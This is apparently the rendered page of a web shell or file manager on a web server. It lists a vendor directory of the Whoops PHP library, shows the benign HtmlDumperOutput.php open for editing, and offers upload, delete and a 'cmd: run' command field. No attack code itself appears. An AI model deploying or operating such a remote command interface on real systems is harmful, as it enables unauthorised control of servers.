/
var
/
www
/
flurhymez
/
vendor
/
filp
/
whoops
/
src
/
Whoops
/
Util
/
/var/www/flurhymez/vendor/filp/whoops/src/Whoops/Util
mkdir
upload
Name
Size
Mode
Actions
HtmlDumperOutput.php
718
0644
edit
dl
rm
Misc.php
1987
0644
edit
dl
rm
SystemFacade.php
2703
0644
edit
dl
rm
TemplateHelper.php
9555
0644
edit
dl
rm
Edit:
/var/www/flurhymez/vendor/filp/whoops/src/Whoops/Util/HtmlDumperOutput.php
(718B)
<?php /** * Whoops - php errors for cool kids * @author Filipe Dobreira <http://github.com/filp> */ namespace Whoops\Util; /** * Used as output callable for Symfony\Component\VarDumper\Dumper\HtmlDumper::dump() * * @see TemplateHelper::dump() */ class HtmlDumperOutput { private $output; public function __invoke($line, $depth) { // A negative depth means "end of dump" if ($depth >= 0) { // Adds a two spaces indentation to the line $this->output .= str_repeat(' ', $depth) . $line . "\n"; } } public function getOutput() { return $this->output; } public function clear() { $this->output = null; } }
Save
cmd:
run